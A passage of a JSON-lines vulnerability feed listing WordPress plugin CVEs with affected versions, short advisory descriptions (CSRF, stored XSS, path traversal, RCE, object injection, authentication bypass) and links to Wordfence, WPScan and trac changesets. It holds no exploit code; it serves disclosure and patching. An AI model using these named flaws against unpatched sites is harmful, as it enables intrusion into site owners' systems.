vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blame\\\/master\\\/templates\\\/wish-list.php#L214\",\"name\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blame\\\/master\\\/templates\\\/wish-list.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blob\\\/fafa2319a8907d3260a89a2a6b4fa9ea6602c7db\\\/templates\\\/wish-list.php#L94\",\"name\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blob\\\/fafa2319a8907d3260a89a2a6b4fa9ea6602c7db\\\/templates\\\/wish-list.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/trunk\\\/templates\\\/wish-list.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/trunk\\\/templates\\\/wish-list.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189775\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wish-list-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wish-list-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14896f-7f0e-4168-8a2d-309bbaddbedc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14896f-7f0e-4168-8a2d-309bbaddbedc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12394","slug":"wp-action-network","versionImpact":"1.4.4","description":"The Action Network plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-action-network\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-action-network\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c90dadc9-0109-4ebd-8135-3efd26682ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c90dadc9-0109-4ebd-8135-3efd26682ad9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13791","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.2 via the downloadResponseFile() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-bit-assist\\\/blob\\\/main\\\/bit-assist\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-bit-assist\\\/blob\\\/main\\\/bit-assist\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17fd14e7-503a-49e4-9344-5f8d51801eb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17fd14e7-503a-49e4-9344-5f8d51801eb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4699","slug":"media-element-html5-video-and-audio-player","versionImpact":"4.2.8","description":"The MediaElement.js WordPress plugin through 4.2.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e57f38d9-889a-4f82-b20d-3676ccf9c6f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e57f38d9-889a-4f82-b20d-3676ccf9c6f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1336","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the ajax_deactivate function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to disable caching.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2296800-93d6-48fa-aa09-3d28fa6371d7\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2296800-93d6-48fa-aa09-3d28fa6371d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0522","slug":"auto-login-when-resister","versionImpact":"1.1.0","description":"The Enable\/Disable Auto Login when Register WordPress plugin through 1.1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7984bfb-86a3-4530-90ae-17ab39af1c54\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7984bfb-86a3-4530-90ae-17ab39af1c54\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2986","slug":"woocommerce-abandoned-cart","versionImpact":"5.14.2","description":"The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, which users are typically customers.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php#L1815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php#L1815\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68052614-204f-4237-af0e-4b8210ebd59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68052614-204f-4237-af0e-4b8210ebd59f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922242\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php?rev=2916178#L1800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php?rev=2916178#L1800\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45823","slug":"video-contest","description":"Cross-Site Request Forgery (CSRF) vulnerability in GalleryPlugins Video Contest WordPress plugin <=\u00a03.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/video-contest\\\/wordpress-video-contest-wordpress-plugin-plugin-3-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/video-contest\\\/wordpress-video-contest-wordpress-plugin-plugin-3-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4840","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.4","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'mappress' shortcode in versions up to, and including, 2.88.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.5\\\/mappress.php?rev=2965022#L919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.5\\\/mappress.php?rev=2965022#L919\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.4\\\/mappress_map.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.4\\\/mappress_map.php#L381\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d2c9a4-32f7-484f-86ce-a33ef1174b28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d2c9a4-32f7-484f-86ce-a33ef1174b28?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6553","slug":"backup-backup","versionImpact":"1.3.7","description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the \/includes\/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.synacktiv.com\\\/en\\\/publications\\\/php-filters-chain-what-is-it-and-how-to-use-it\",\"name\":\"https:\\\/\\\/www.synacktiv.com\\\/en\\\/publications\\\/php-filters-chain-what-is-it-and-how-to-use-it\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1806","slug":"wp-user-avatar","versionImpact":"4.15.1","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/tags\\\/4.15.0\\\/src\\\/ShortcodeParser\\\/EditProfileTag.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/tags\\\/4.15.0\\\/src\\\/ShortcodeParser\\\/EditProfileTag.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3406","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bfab060-64d2-4c38-8bc8-a8f81c5a6e0d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bfab060-64d2-4c38-8bc8-a8f81c5a6e0d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5172","slug":"expert-invoice","versionImpact":"1.0.2","description":"The Expert Invoice WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d84e69-0548-4c7d-bcde-5777d72da555\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d84e69-0548-4c7d-bcde-5777d72da555\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6496","slug":"light-poll","versionImpact":"1.0.0","description":"The Light Poll WordPress plugin through 1.0.0 does not have CSRF checks when deleting polls, which could allow attackers to make logged in users perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d598eabd-a87a-4e3e-be46-a5c5cc3f130e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d598eabd-a87a-4e3e-be46-a5c5cc3f130e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8318","slug":"attributes-for-blocks","versionImpact":"1.0.6","description":"The Attributes for Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018attributesForBlocks\u2019 parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0101dd1-a9cb-4b9c-8299-9b808d7e1912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0101dd1-a9cb-4b9c-8299-9b808d7e1912?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attributes-for-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attributes-for-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attributes-for-blocks\\\/trunk\\\/attributes-for-blocks.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fattributes-for-blocks&old=3066420&new_path=%2Fattributes-for-blocks&new=3144730&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fattributes-for-blocks&old=3066420&new_path=%2Fattributes-for-blocks&new=3144730&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6931","slug":"the-events-calendar","versionImpact":"6.6.3","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via RSVP name field in all versions up to, and including, 6.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f847d8-323f-47f9-ba10-df8173ff3018?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f847d8-323f-47f9-ba10-df8173ff3018?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-events-calendar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-events-calendar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150170\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150170\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36839","slug":"free-sales-funnel-squeeze-pages-landing-page-builder-templates-make","versionImpact":"0.99","description":"The WP Lead Plus X plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.99. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to perform administrative actions, such as adding pages to the site and\/or replacing site content with malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddb97db0-cbf3-42be-a5c7-12fc2a2bc9e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddb97db0-cbf3-42be-a5c7-12fc2a2bc9e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/free-sales-funnel-squeeze-pages-landing-page-builder-templates-make\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12807","slug":"share-buttons","versionImpact":"2.7","description":"The Social Share Buttons for WordPress plugin through 2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcce0839-bb1d-4aa3-b236-ff5f5e9b6120\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcce0839-bb1d-4aa3-b236-ff5f5e9b6120\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13735","slug":"hurrytimer","versionImpact":"2.11.2","description":"The HurryTimer \u2013 An Scarcity and Urgency Countdown Timer for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.11.2 due to insufficient input sanitization and output escaping of a campaign name. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/docs.hurrytimer.com\\\/getting-started\\\/creating-a-one-time-campaign\",\"name\":\"https:\\\/\\\/docs.hurrytimer.com\\\/getting-started\\\/creating-a-one-time-campaign\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239755\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239755\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hurrytimer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hurrytimer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5b247a7-50f4-4d35-b24a-2c788ba0b051?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5b247a7-50f4-4d35-b24a-2c788ba0b051?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7697","slug":"integration-for-contact-form-7-and-google-sheets","versionImpact":"1.1.1","description":"The Integration for Google Sheets and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-google-sheets\\\/tags\\\/1.1.1\\\/integration-for-contact-form-7-and-google-sheets.php#L923\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-google-sheets\\\/tags\\\/1.1.1\\\/integration-for-contact-form-7-and-google-sheets.php#L923\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-google-sheets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-google-sheets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0146f17-35bd-45cf-b9c6-c4fce688efc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0146f17-35bd-45cf-b9c6-c4fce688efc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1335","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the ucss_connect function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to connect a new license key to the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eba48c51-87d9-4e7e-b4c1-0205cd96d033\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eba48c51-87d9-4e7e-b4c1-0205cd96d033\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0514","slug":"member-database","versionImpact":"1.0","description":"The Membership Database WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cc400a-9bfb-417d-9206-5582a49d0f05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cc400a-9bfb-417d-9206-5582a49d0f05\",\"refsource\":\"MISC\",\"tags\":[]}]"}
